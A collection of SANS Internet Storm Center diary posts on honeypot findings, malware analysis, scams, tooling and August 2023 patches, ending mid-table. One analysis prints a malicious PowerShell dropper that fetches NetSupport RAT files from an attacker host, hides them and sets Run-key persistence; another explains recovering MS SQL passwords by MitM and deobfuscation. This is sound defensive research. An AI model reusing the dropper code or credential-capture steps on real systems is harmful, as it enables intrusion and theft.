SANS

This month, my DShield sensor captured for the first time this request: /systembc/password.php. I checked back for the past 6 months and only have noticed this request this 5 times this month from 4 different sources. According to some references, this is likely the SystemBC Remote Access Trojan (RAT), all 4 IPs are part of the Digital Ocean ASN and only one has been reported as likely malicious. Several samples have been reported to Any.run this month. 

To verified if there was some kind of change, I reviewed DShield logs submission for the past year and noticed nothing really significant until the beginning of Jan 2023 looking for this directory. However, starting on the 3rd of Aug 2023, there a significant change in the daily report for this directory going from an average of 30 submission to 445 and overing in the hundred since then.[1] 

Indicator of Compromised

170.64.155.243
161.35.62.73
165.22.160.237
178.128.79.70

/systembc/password.php
/upl.php

[1] https://isc.sans.edu/weblogs/urlhistory.html?url=%2Fsystembc%2Fpassword.php
[2] https://isc.sans.edu/diary/Excel+spreadsheets+push+SystemBC+malware/27060
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
[4] https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6
[5] https://bazaar.abuse.ch/sample/964a9d8fbfd1886a93c1c09493db044bd37e517c4def61aa779c8734cb5cd68d/
[6] https://any.run/malware-trends/systembc
[7] https://www.virustotal.com/gui/ip-address/178.128.79.70/detection

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing remains a lucrative threat. We get daily emails from well-known brands (like DHL, PayPal, Netflix, Microsoft, Dropbox, Apple, etc). Recently, I received a bunch of phishing emails targeting Zalando customers. Zalando is a German retailer of shoes, fashion across Europe. It was the first time that I saw them used in a phishing campaign.

The attached archive contains a single JavaScript file:

remnux@remnux:/MalwareZoo/20230816$ zipdump.py nine-life1107.zip Index Filename Encrypted Timestamp 1 nine-life1107.js 0 2023-08-15 12:23:08

As usual, with this language, the script is pretty well obfuscated. Here is an example of an implemented function:

 

(function (E, i) { var hw = { E: '0x264', i: 'XgQW', u: '0x246', z: 'OMHH', S: '0x211', L: '4[3N', T: '0x1ae', f: '@(sj', R: '0x230', Q: '8JTc', g: '0x1c0', n: '$GmP', d: 'CgxP', l: '0x1dc', W: 'Q9Z5', c: '0x1a9', x: '90vH' }; var s = Y; var J = Y; var o = Y; var V = Y; var D = Y; var u = E(); while (!![]) { try { var z = -parseInt(s(hw.E, hw.i)) / 0x1 + parseInt(J(hw.u, hw.z)) / 0x2 * (parseInt(J(hw.S, hw.L)) / 0x3) + -parseInt(o(hw.T, hw.f)) / 0x4 * (parseInt(s(hw.R, hw.Q)) / 0x5) + parseInt(V(hw.g, hw.n)) / 0x6 + -parseInt(V('0x22f', hw.d)) / 0x7 + parseInt(D(hw.l, hw.W)) / 0x8 + -parseInt(o(hw.c, hw.x)) / 0x9; if (z === i) { break; } else { u['push'](u['shift']()); } } catch (S) { u['push'](u['shift']()); } } }(y, 0x75686));

Diving into the code to spot interesting strings or techniques is always interesting. The script contains some references to "WScript" to call the method "ShellExecute"… We are facing a script for Windows. The script is a dropper and will drop/execute a PowerShell script:

C:\Users\user01\AppData\Roaming\42c0tyi.ps1

The script is less heavily obfuscated and easy to understand. It uses bitsadmin.exe, the well-known LOLbin, to download many files from a website. Well, not always bitsadmin.exe. This tool can be called directly from Powershell. That's what the attacker is testing in this case: The script checks if BitsAdmin and ExpandArchive are available inside PowerShell and use them. Otherwise, it will launch the standalone executable and download files one by one:

$g3tSp4=Get-Command expand-archive -ErrorAction SilentlyContinue; $PsaB17=Get-Command Start-BitsTransfer -ErrorAction SilentlyContinue; if ($g3tSp4) { if ($PsaB17) { Start-BitsTransfer -Source $l1kps4 -Destination $p47Spa; } else { Invoke-Expression -Command $sPaad }; expand-archive -path $p47Spa -destinationpath $SP4z3p; Remove-Item -path $p47Spa; } else { $f1lePsa=@('AudioCapture.dll', 'client32.exe', 'client32.ini', 'HTCTL32.DLL', 'msvcr100.dll', 'nskbfltr.inf', \   'NSM.LIC', 'pcicapi.dll', 'PCICHEK.DLL', 'PCICL32.DLL', 'remcmdstub.exe', 'TCCTL32.DLL'); $l1kps42='https://tukudewe.com/js/h3b2_jsg/'; New-Item -Path $env:APPDATA -Name $sP4k3 -ItemType 'directory'; if ($PsaB17) { $f1lePsa | ForEach-Object { $sp4suR=$l1kps42+$_; $spaD3s7=$SP4z3p+'\'+$_; Start-BitsTransfer -Source $sp4suR -Destination $spaD3s7; }; } else { $f1lePsa | ForEach-Object { $sp4suR=$l1kps42+$_; $spaD3s7=$SP4z3p+'\'+$_; $sPaad2='bitsadmin.exe /transfer Spadow /download /priority normal '+$sp4suR+' '+$spaD3s7; Invoke-Expression -Command $sPaad2; }; }; };

Another trick used in the script: Files are downloaded in the directory  C:\Users\REM\AppData\Roaming\MsEdgeSandbox, and the directory attributes are modified to hide it:

$H1foSp4=Get-Item $SP4z3p -Force; $H1foSp4.attributes='Hidden'; cd $SP4z3p;

Finally, persistence is implemented:

$p4t3hCl1=$SP4z3p+'\client32.exe'; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $sP4k3 -Value $p4t3hCl1 -PropertyType 'String';

The zip archive, the Javascript, and Powershell were unavailable on VT. What about the downloaded malware? Many files are downloaded on the victim's computer, but the first one to be executed is "client32.exe" (SHA256:89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1) and has a low VT score: 5/71[1]. This malware is a good old NetSupport Manager RAT[2]! No need to perform deep reverse engineering. The RAT configuration is available in the file client32.ini. The C2 server is: jokosampbulid1[.]com:1412 (which is down when writing this diary).

The RAT files are downloaded from tukudewe[.]com.

[1] https://www.virustotal.com/gui/file/89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1/detection
[2] https://www.netsupportmanager.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

There are occassions where data needs to cleaned prior to use. One example came to me while reviewing passwords submitted to one of my DShield honeypots. There appeared to be duplicate passwords, even when I attempted to export unique values from the command line. 

# read cowrie JSON files in /logs/ directory # cat /logs/cowrie.json.* # # select data where password key is present # jq 'select(.password)' # # return password data in raw format (without quotes) # jq -r .password # # sort the data alphabetically # sort # # deduplicate the data and store in a text file # uniq > 2023-08-15_unique_passwords_raw.txt # cat /logs/cowrie.json.* | jq 'select(.password)' | jq -r .password | sort | uniq > 2023-08-15_unique_passwords_raw.txt

 

Figure 1: Output of exported data showing what appear to be duplicate values

In the example above, it would appear that "123456" is being displayed three times from the exported text, even when attempting to remove duplicates from the resulting file. Since the project being worked on involved comparing data using Python, it seemed like a good idea to use Python to compare these values. 

import os passwords = [] passwords_bytes = [] # read data from text file into passwords list with open("2023-08-15_unique_passwords_raw.txt", "r", encoding="utf-8") as file: for line in file: passwords.append(line) # read data from text file as bytes into passwords_bytes list with open("2023-08-15_unique_passwords_raw.txt", "rb") as file: for line in file: passwords_bytes.append(line) # print passwords begining with "123456" for index, password in enumerate(passwords): if password[:6] == "123456": print(index, password, passwords_bytes[index])

Figure 2: Comparing bytes data with Python shows additional formatting data

Now the differences between the data is clear when looking at the Python bytes values. This was not easy to recognize when using the "cat" defaults :

• \n - newline / line feed, this was anticipated in a text file with items per line
• \t - tab
• \r - carriage return (returns to the beginning of the same line)

 There are also some "cat" [1] options to highlight the same information. 

cat -A 2023-08-15_unique_passwords_raw.txt | grep -a ^123456 | head -n 20 123456$ 123456^I$ 123456^M$ 123456!$ 123456! $ 123456! $ 123456!!$ 123456!!!$ 123456!!@@##$ 123456!@$ 123456!@ $ 123456!@#$ 123456!@#"$ 123456#$ 123456#@!$ 123456&$ 123456&*$ 123456&*($ 123456&*()$ 123456*$

Using the "A" option gives comparable output:

• $ - newlines
• ^I - tab
• ^M - carriage return

An additional option is to use the "od" command, which gives output just like the Python bytes output. 

Figure 3: Output of "od" command showing extra string formatting

Some of this data data can also be removed easily. An example from the terminal to remove tabs and carriage returns:

cat 2023-08-15_unique_passwords_raw.txt | grep -a ^123456 | head -n 20 | tr -d "\t" | tr -d "\r" | uniq 123456 123456! 123456! 123456! 123456!! 123456!!! 123456!!@@## 123456!@ 123456!@ 123456!@# 123456!@#" 123456# 123456#@! 123456& 123456&* 123456&*( 123456&*() 123456*

Knowing a bit more on exactly what was happening also helped me compare the data in a different way. 

 

Figure 4: Password hashes of data compared with passwords in Python bytes

My original goal was to hash all of the unique honeypot passwords that I have collected and compare them with data in HaveIBeenPwned [3]. Upon reviewing the data in more detail, another option presented itself. The bytes data could also be used directly with hashlib. 

Figure 5: Comparison of password hashes when using utf-8 or bytes data from a text file of passwords

This is not ideal since the newlines are undesired, but it gives another path when processing the data. Just a good reminder that while values look unique, they may not be. It's helpful to explore data and see if any data cleaning is necessary. In my case, more cleaning is needed. 

 

[1] https://www.cyberciti.biz/faq/linux-unix-appleosx-bsd-cat-command-examples/

[2] https://www.cyberciti.biz/faq/how-to-remove-carriage-return-in-linux-or-unix/

[3] https://haveibeenpwned.com/Passwords

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Considering the global turbulence from destabilizing events such as physical conflicts, freak weather and pandemics, financial wealth has never been more critical for a nation and its citizens so that daily life can continue. Money is needed for daily necessities such as food, medication, appropriate clothing and fuel. When faced with unexpected events such as retrenchment and newly detected health issues, citizens would also have to tap on the monetary buffer that should have been built up during less challenging times. Considering the current state of international affairs and employment prospects, one potential way to disrupt a nation’s peace and stability could be stealing their citizens’ monetary savings via financial scams and fraud.

Unlike conventional cyber-attacks such as phishing, where adversaries target to harvest credentials to gain access to accounts, digital scams aim to bypass the harvesting of credentials but instead attempt to convince the victim to authenticate and part with their assets directly. A multitude of factors could cause this change. For example, end users have gotten savvier about phishing attacks and stopped interacting with such messages that try to masquerade as a well-known entity (e.g. shipping companies/social media sites). Applications could also have implemented additional security controls such as two-factor authentication (2FA), preventing adversaries from directly using credentials to authenticate with the target application. The main issue is that adversaries are likely to employ some means to wire away a victim’s hard-earned money and keep on doing so should these tactics be successful.

There have been a few notable case studies where adversaries do not simply send phishing messages but also pray on victims’ psychological weaknesses and informational blind spots. I was made aware of such an incident that was reported to me privately about 60 hours ago, where an adversary attempted to masquerade as a charitable organization. In this particular incident, the charitable organization had a legitimate and actual event that had been scheduled. There were also corresponding marketing materials with Quick Response (QR) codes embedded in the posters. Participants could register for the event by donating any amount via the QR code (using the local Singapore QR code payment system) and sending the receipt to a number shown on the poster. Most event details were correct; even the e-mail address shown was legitimate. However, upon closer inspection and after some analysis, it was determined that the actual event had already been held, and the QR code used for payments pointed to an account not affiliated with the charitable organization. Meanwhile, the “semi-fictitious” event had been circulated via popular messaging platforms such as Telegram. It is unclear if anyone made any payments to the monetary account that the scammer set up, but the original message had been removed.

Another recent attack that led to victims losing their money was the installation of third-party mobile applications that were not downloaded from legitimate and trusted mobile application stores. For example, in this unfortunate incident, the victim was left with only about ~US$2.95 (S$4) in the bank account after unknowingly installing a purported update to a mobile application [1]. The Federal Bureau of Investigation (FBI) also issued a Public Service Announcement (PSA) about cyber criminals targeting victims through mobile beta-testing applications, which could lead to monetary losses [2]. This was also highlighted in the Wednesday, August 16th 2023, SANS Internet Storm Center Stormcast [3].

Security controls can only do so much in preventing such unfortunate incidents. Due to financial challenges, not everyone can afford the latest phones, which may come promised with security support. Depending on the vendors, certain phones may not even receive timely security patches, and adversaries could tap into those vulnerabilities to perpetuate their digital scams. It could also be user-induced due to the removal of security controls designed to secure phones (e.g. rooting (for Android) or jail-breaking (for iOS)). There is room for research on possible ways to disrupt and deny adversaries who perpetuate such digital scams while factoring in current technical limitations and scenarios. However, without any technological implementation, awareness of these digital scams is paramount as a first step towards foiling such attacks. No doubt such attack techniques may seem trivial to cybersecurity professionals since we are aware of such dangers, other individuals may not fully understand the potential dangers of such digital scams. It would be worthwhile to consider having conversations and greater awareness about these digital scams in your organization and among friends and families.

References:
1. https://www.asiaone.com/singapore/only-4-left-single-mum-loses-28k-after-phone-gets-hacked-realises-she-has-2-chromes
2. https://www.ic3.gov/Media/Y2023/PSA230814
3. https://isc.sans.edu/podcastdetail.html?podcastid=8618

-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

10 years ago I wrote blog post "PDFiD: False Positives" to talk about false positives generated by my tool pdfid.py.

pdfid.py is a triage tool: it's essentially a "string search tool", that looks for certain keywords, without parsing the document's PDF structure.

One of the keywords it looks for is /JS, that indicates the presence of JavaScript. And since /JS is a short string, it can happen that PDF documents contain that character sequence (/JS) somewhere inside a binary stream, with a totally different meaning. At that moment, it's not a keyword, but just a byte sequence found inside a binary stream (for example, a JPEG image).

So that's a false positive, because it is not an indicator for the presence of JavaScript.

10 years ago, I adviced to use pdf-parser to search for those sequences.

From time to time, people still ask me about these false positives, and it's actually good to write a revisited diary entry about this.

If you have a PDFiD detection for a short string like /JS:

And you can't find it with pdf-parser.py:

Then use pdf-parser's option -a to calculate statistics:

If the /JS detection is a false positive, then it will not appear in pdf-parser's statistics: that's because pdf-parser is a PDF parser, and can distinguish between keywords found in the right place (/JS inside a dictionary) and the wrong place (/JS inside a binary stream).

Notice that it's best to use option -a together with -O, because then stream objects (/ObjStm) will also be parsed:

And just for reference, this is how the output of pdfid and pdf-parser looks with true positives:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Scott Jensen]

Using an ELK (elasticsearch logstash kibana) or Elastic Stack is a great way to get a high-level view of what is being seen with your DShield [1] honeypot.

For those who don’t already have a dedicated ELK stack or are just looking for a way to monitor your honeypot from a separate device (in my case, I didn’t want to put more holes in my internal firewall), follow this step-by-step guide to get up and running quickly.

First of we need to get logs from the honeypot configured to use an ELK beat, if you want a great guide on collecting all the logs see this diary [2] posted on the ISC page.

This is an ELK (Elasticsearch Logstash Kibana) stack that is setup to monitor logs from a DShield honeypot.

It is put together using the Getting started with the Elastic Stack and Docker-Compose [3] project with Linux Ubuntu live server 22.04 and the Install & Configure Filebeat on Raspberry Pi ARM64 to Parse DShield Sensor Logs [2] diary. The only change is to edit the filebeat.yml to send to the IP address of the device you intend to run Dshield-ELK [4] on.

Dshield-ELK assumes the following prior to starting:

• A running DShield Honeypot [1]
• Docker (tested on Ubuntu 20.04 LTS running Docker version 24.0.5, but this should work on any platform)
• Confirm the DShield sensor can reach the logstash port TCP 5044. This port will not be reachable until docker compose has been setup.

Steps

1. Setup filebeat per Install & Configure Filebeat on Raspberry Pi ARM64 to Parse DShield Sensor Logs [2] up to the Setup Logstash Collection & Parsing.
2. Install docker as follow: [3]

• $ sudo apt-get install ca-certificates curl gnupg
• $ sudo install -m 0755 -d /etc/apt/keyrings
• $ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
• $ sudo chmod a+r /etc/apt/keyrings/docker.gpg
• $ echo "deb [arch="$(dpkg --print-architecture)" signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu "$(. /etc/os-release && echo "$VERSION_CODENAME")" stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
• $ sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

3. Clone Dshield-ELK[4] to the /home user directory.

• $ sudo apt-get install git
• $ git clone https://github.com/fkadriver/Dshield-ELK.git

4. Change to the DShield-ELK directory.

• $ cd ~/DShield-ELK

5. Change any environment variables in .env (hidden file). Any editor can be used (i.e. vi, vim, nano), but recommend using nano if you are not familiar with another editor

• $ nano .env (note the '.' at the front of .env)

Recommend changing at least:

• ELASTIC_PASSWORD is the password that is used for administrative access to both Elastic and Kibana
• KIBANA_PASSWORD is only used as the internal password for Kibana to communicate to Elastic

Optional

• STACK_VERSION is the version of elastic used in this stack. The build has been tested with 8.8.2 but any version should work
• DNS_SERVER Is a list of DNS Sever(s) used in the filters. The default setup in each filter is to use what ever DNS settings that are defined on the host. If you want to use specific DNS server(s) you need to change the DNS_SERVER variable and un-comment the # nameserver lines in the following files:
  • logstash-200-filter-cowrie.conf: line 115
  • logstash-202-filter-cowrie-sqlite.conf: line 284
  • logstash-300-filter-iptables.conf: line 63

Memory Limits are the most memory that docker will allocate for each of the ELK containers. Default to 1073741824 (1GB) but can be expanded if you have the resources

• ES_MEM_LIMIT: Elastic Memory
• KB_MEM_LIMIT: Kibana Memory
• LS_MEM_LIMIT: Logstash memory

6. Save the .env file to the same location

• If using nano, ^o and then ^x

 7. Once the project and any setting changes (if applicable) have been completed, it is time to bring up the stack. This will take a few minutes especially if you have not previously pulled the elastic images.

• $ sudo docker compose up -d (the -d is optional, but without it, when you close the prompt or stop the command the container will shut down). See Overview of docker compose CLI5 for more information about the docker compose cmd

8. Open a browser and confirm that the following ports are your host:

• 5601: Kibana
  • User: elastic
  • Password: ${ELASTIC_PASSWORD}
  • http://localhost:5601 (this can also be http://IP:5601 for remote access)
• 9200: Elastic
  • User: elastic
  • Password: ${ELASTIC_PASSWORD}
  • Since version 8, the connection to ES is secured with a self signed cert, so you will have to use https://localhost:9200. (You might be prompted to use an insecure or self-signed certificate. This is normal)

9. Logstash will also be running on port 5044

• 5044: Logstash
  • This is setup to receive any beats input, but only has filters and output for cowrie* logs from the diary [2].
  • Additional filters can be added to the logstash/pipeline directory.

10. Connect to Kibana on port 5601 (http://localhost:5601 ) using the user elastic and the password {ELASTIC_PASSWORD} from the .env file.

11. If everything worked, you should be able to open [Logs DShield Sensor] Overview dashboard

After you first login, import the DShield dashboard from this source and in Kibana goto:

• Management
• Stack Management
• Kibana
• Saved Objects
• select Import and import dshield_sensor_8.71.ndjson

Now you should see in Kibana, Data Views a mapping to the 3 cowrie* tables. Go back to Dashboard and open [Logs DShield Sensor] Overview to confirm that filebeat and logstash are parsing your data.

12. Here is a snip of the dashboard over the past 24 hours

13. After a reboot, to restart the DShield ELK stack do:

• $ cd ~/Dshield-ELK
• $ sudo docker compose start
• $ sudo docker compose ps

For any updates, check out Scott Jensen's github site.

[1] https://isc.sans.edu/tools/honeypot/
[2] https://isc.sans.edu/diary/Install+Configure+Filebeat+on+Raspberry+Pi+ARM64+to+Parse+DShield+Sensor+Logs/30056
[3] https://docs.docker.com/engine/install/ubuntu/
[4] https://github.com/fkadriver/Dshield-ELK
[5] https://docs.docker.com/compose/reference/
[6] https://docs.docker.com/engine/security/rootless/
[7] https://handlers.sans.edu/gbruneau/elk/DShield/dshield_sensor_8.71.ndjson

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

It's a key point for attackers to implement anti-debugging and anti-analysis techniques. Anti-debugging means the malware will try to detect if it's being debugged (executed in a debugger or its execution is slower than expected). Anti-analysis refers to techniques to detect if the malware is detonated in a sandbox or by a malware analyst. In such cases, tools run in parallel with the malware to collect live data (packets, API calls, files, or registry activity).

The Microsoft API set is fantastic because it contains many helpful API calls for attackers. Today I found a malicious Python script that (ab)uses one of them: GetWindowText()[1]. This API call is very powerful when used in combination with EnumWindows()[2]. EnumWindows() will list all top-level windows opened on the screen and pass the handle to each window to a callback function that will check the window title via GetWindowText(). 

That's what has been implemented in the Python script:

The script used the ctype library to use Windows API calls. EnumWindows() is called in a loop; for each window found, the callback function winEnumHandler() is called. The window title is extracted and compared to a nice list of well-known tools used by malware analysts.

The malware will not silently exit if a suspicious window is found. Instead, it will link the process to the window and try to kill it using GetWindowThreatProcessId()[3]!

Another good example of API calls group that reveals a specific technique used by attackers! The script (SHA256:c8a5262e89751f231060a6740447062e34c5393a17f67d0c4eb52c7f911f3bd2) has a VT score of 6/60[4].

[1] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowtexta
[2] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows
[3] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowthreadprocessid
[4] https://www.virustotal.com/gui/file/c8a5262e89751f231060a6740447062e34c5393a17f67d0c4eb52c7f911f3bd2

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fat client applications running on (usually) Windows are still extremely common in enterprises. When I look at internal penetration tests or red team engagements for any larger enterprise, it is almost 100% guaranteed that one will stumble upon such an application.

These fat client applications have also usually been originally written many, many years ago, when security was maybe not one of the primary requirements. Whenever one encounters such a fat client application, or if this is perhaps part of your penetration test, one of the primary goals is to analyze how the application communicates with the rest of the world (or, usually, other internal systems).

While modern applications that you might encounter will most of the time consume some web services (usually SOAP, but I can see modern RESTful interfaces being consumed more and more), “traditional” fat client applications will most of the time connect directly to a database (again, since we’re looking at Windows environment primarily here, this will be most of the time a Microsoft SQL Server database). Such setup will appear quite simple and is shown in the following figure:

The first step in identifying such an application will usually be to inspect its network traffic. In 99% of cases, this will be trivial to perform by using a tool such as Wireshark. This will allow not only to identify the target MS SQL Server, but also to inspect traffic on the wire. We will be looking for any traffic with destination TCP port set to 1433.

Again, due to the age of such applications, in almost every case I worked on, the data on the wire is most of the time sent in plain text, without any encryption. This is, obviously, very bad as we could easily perform a MitM attack (see more below), but the TDS protocol will, luckily, have one step encrypted: authentication. 

SQL Server Authentication

Microsoft SQL server supports two authentication types: the builtin Windows authentication as well as SQL Server authentication. This second authentication mechanism is interesting to us, and is used by majority of fat client applications (at least those that I tested).

The workflow will look like this:

• The fat client application will use a single (usually quite powerful) account to login to the MS SQL database server, using the SQL Server authentication protocol
• Now the end user will be required to authenticate locally by the fat client application (this is usually a login screen displayed by the fat client application)
• The fat client application will verify if the entered username/password pair is correct (again, by checking something in the database)
• If everything goes well, the user has been authenticated and the fat client application will display the corresponding GUI

You can probably already see a critical step here – that single account used by the fat client application to login to the MS SQL database server.

This must be heavily guarded – I’ve seen examples of when these credentials were stored in a plain text configuration file or registry, but also cases when they were encrypted, and the encryption algorithm was heavily obfuscated (Borland – I’m looking at you).

Of course, for an attacker, getting these credentials is one of their primary goals since they will usually allow full access over the database, as well as potential lateral movement by exploiting the target systems further.

So how do we get the username and password, if they are encrypted in configuration? If we just monitor network traffic, they will still not be visible as modern SQL Server databases will encrypt the authentication exchange (see above), no matter if the rest of encryption is turned off. In other words, we can see SQL queries after authentication, but we will not be able to see the exchanged username and password, which means that we must dig deeper.

Authentication MitM

As the authentication part will be encrypted, we will want to somehow obtain this information in plain text (or whatever it is, as we will see later). There are couple of ways to do this, and here are my favorite methods.

Depending on the application, sometimes the easiest way will be to inject into the fat client application and monitor data before it’s being passed for encryption. There are several tools that you can use for this, that will require more or less experience:

• Frida (https://frida.re/) is a very powerful dynamic instrumentation toolkit that will allow you to instrument almost anything in the target application. It’s very popular in mobile application penetration testing but we can use it here as well.
• Echo Mirage – the original tool that will allow you to hook SSL/TLS libraries and inspect network traffic before it’s being encrypted (for outgoing traffic), and after it’s being decrypted (for incoming traffic). I still tend to use this tool quite a bit as it simply works, even on the latest Windows (despite being 20 years old).
• Hallucinate (https://github.com/SySS-Research/hallucinate/), a tool originally based on Echo Mirage and Frida, that might be more stable.

Besides this, we might also run a MitM attack on the network; if there is no certificate pinning in the fat client application, our tool of choice will usually be mitmproxy (https://mitmproxy.org/), where I suggest that you check the mitmdump command line interface and the Wireguard mode.

No matter which of the tools above is used, our goal will be to capture username/password pair when the fat client application is authenticating with the target MS SQL database. And if succeeded in that, we might be a bit disappointed – even after defeating network encryption, the password is still not passed in plain-text and we might see something like this:

plaintextusername 0x00 A2A5B3A592A592A5D2A553A582A5E3A5 0x00

Defeating 20-year-old obfuscation

The highlighted bytes above probably contain password, but it’s indeed not in plaintext. That being said, it looks like this is not encryption but some obfuscation – notice how certain bytes (0xA5) appear quite often.

20 years ago David Litchfield, a great researcher (hands up if you’ve been on the Bugtraq mailing list back then) published a paper detailing how this obfuscation works. There was a small bug there that was corrected and it’s remarkable that the same algorithm is still used today (talk about backward compatibility). So what MS SQL Server will do with a password is the following:

• Convert the password to the Unicode character set; this will result in “extending” an ASCII password with null bytes (0x00)
• Swap the upper and lower nibble (4 bits) of every byte
• XOR every byte with 0xA5

Not too difficult, right? With this in mind, we can easily take the obfuscated password we retrieved on the wire and decode it. I wrote a very simple Python script to do that, which is available at https://github.com/bojanisc/SQLAuthDecrypt, let’s try it:

$ SQLAuthDecrypt.py 
Enter encrypted password: A2A5B3A592A592A5D2A553A582A5E3A5
Decrypted password: password

Nice! We got the plaintext password of the main account used by our fat client application. Now it’s time to try to perform some lateral movement, perhaps beginning with utilizing xp_cmdshell.

Finally, how do we prevent this? Well, one solution is easy – do not use SQL Server authentication but instead have users use their Windows credentials for authentication. This will open a can of worms with the application shown above as it would require the application to probably be re-engineered a lot – and I guess that this is one of the reasons why we still see these vulnerabilities, 20 years after they have been published.

--
Bojan
@bojanz
INFIGO IS

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This month we got patches for 88 vulnerabilities. Of these, 6 are critical, and 2 are already being exploited, according to Microsoft.

One of the exploited vulnerabilities is .NET and Visual Studio Denial of Service Vulnerability (CVE-2023-38180). The max severity for the vulnerability is important and the CVSS is 7.5.

The other exploited vulnerability is Microsoft Office Defense in Depth Update (ADV230003). According to the advisory this defense in depth update is not a vulnerability, but installing this update stops the attack chain leading to the Windows Search security feature bypass vulnerability (CVE-2023-36884). Microsoft recommends installing the Office updates discussed in this advisory as well as installing the Windows updates from August 2023.

Moving to critical vulnerabilities, there are Remote Code Execution (RCE) vulnerabilities affecting Microsoft Message Queuing (CVE-2023-35385, CVE-2023-36910, and CVE-2023-36911). According to the advisory, the Windows message queuing service, which is a Windows component, needs to be enabled for a system to be exploitable by this vulnerability. This feature can be added via the Control Panel. You can check to see if there is a service running named Message Queuing and TCP port 1801 is listening on the machine. Successful exploitation of this vulnerability could allow an unauthenticated attacker to remotely execute code on the target server. The attack complexity is low, no privileges and no user interaction are required. The CVSS for this vulnerability is 9.8.

August 2023 Security Updates

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) -- no title -- %%cve:2023-35945%% No No - - - 7.5 7.5 .NET Core and Visual Studio Denial of Service Vulnerability %%cve:2023-38178%% No No - - Important 7.5 6.5 .NET Framework Spoofing Vulnerability %%cve:2023-36873%% No No - - Important 7.4 6.7 .NET and Visual Studio Denial of Service Vulnerability %%cve:2023-38180%% No Yes - - Important 7.5 6.7 .NET and Visual Studio Remote Code Execution Vulnerability %%cve:2023-35390%% No No - - Important 7.8 7.0 AMD: CVE-2023-20569 Return Address Predictor %%cve:2023-20569%% No No - - Important     ASP.NET Core SignalR and Visual Studio Information Disclosure Vulnerability %%cve:2023-35391%% No No - - Important 7.1 6.4 ASP.NET Elevation of Privilege Vulnerability %%cve:2023-36899%% No No - - Important 7.5 6.7 Azure Apache Ambari Spoofing Vulnerability %%cve:2023-36881%% No No - - Important 4.5 3.9 Azure Apache Hadoop Spoofing Vulnerability %%cve:2023-38188%% No No - - Important 4.5 3.9 Azure Apache Hive Spoofing Vulnerability %%cve:2023-35393%% No No - - Important 4.5 3.9 Azure Apache Oozie Spoofing Vulnerability %%cve:2023-36877%% No No - - Important 4.5 3.9 Azure Arc-Enabled Servers Elevation of Privilege Vulnerability %%cve:2023-38176%% No No - - Important 7.0 6.1 Azure DevOps Server Spoofing Vulnerability %%cve:2023-36869%% No No - - Important 6.3 6.0 Azure HDInsight Jupyter Notebook Spoofing Vulnerability %%cve:2023-35394%% No No - - Important 4.6 4.0 Chromium: CVE-2023-4068 Type Confusion in V8 %%cve:2023-4068%% No No - - -     Chromium: CVE-2023-4069 Type Confusion in V8 %%cve:2023-4069%% No No - - -     Chromium: CVE-2023-4070 Type Confusion in V8 %%cve:2023-4070%% No No - - -     Chromium: CVE-2023-4071 Heap buffer overflow in Visuals %%cve:2023-4071%% No No - - -     Chromium: CVE-2023-4072 Out of bounds read and write in WebGL %%cve:2023-4072%% No No - - -     Chromium: CVE-2023-4073 Out of bounds memory access in ANGLE %%cve:2023-4073%% No No - - -     Chromium: CVE-2023-4074 Use after free in Blink Task Scheduling %%cve:2023-4074%% No No - - -     Chromium: CVE-2023-4075 Use after free in Cast %%cve:2023-4075%% No No - - -     Chromium: CVE-2023-4076 Use after free in WebRTC %%cve:2023-4076%% No No - - -     Chromium: 